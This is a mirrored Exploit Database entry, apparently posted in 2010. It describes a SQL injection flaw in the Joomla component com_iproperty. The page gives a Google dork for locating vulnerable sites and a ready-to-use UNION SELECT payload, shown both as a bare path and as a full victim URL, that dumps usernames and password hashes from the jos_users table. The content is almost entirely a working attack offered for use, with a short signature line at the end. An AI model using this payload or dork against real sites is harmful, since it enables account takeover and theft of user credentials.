Joomla! Component com_iproperty – SQL Injection

• Exploit Database
• 5 阅读

• 作者： Amine_92
  日期： 2010-07-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14450/

• ====================================================
  Joomla Component com_iproperty SQL Injection Vulnerability
  ====================================================
  
  Author : Amine_92
  Email: amine92_16@hotmail.fr
  Homepage : www.vbhacker.net/vb
  DORK:inurl:"index.php?option=com_iproperty"
  ====================================================
  
  [+] Vulnerable File :
  http://www.site.com/index.php?option=com_iproperty&view=agentproperties&id=[SQL]
  
  [+] ExploiT :
  index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--
  
  [+] Example :
  http://www.victime.com/index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--
  
  ====================================================
  la illaha ila la mohamed rasoulou lah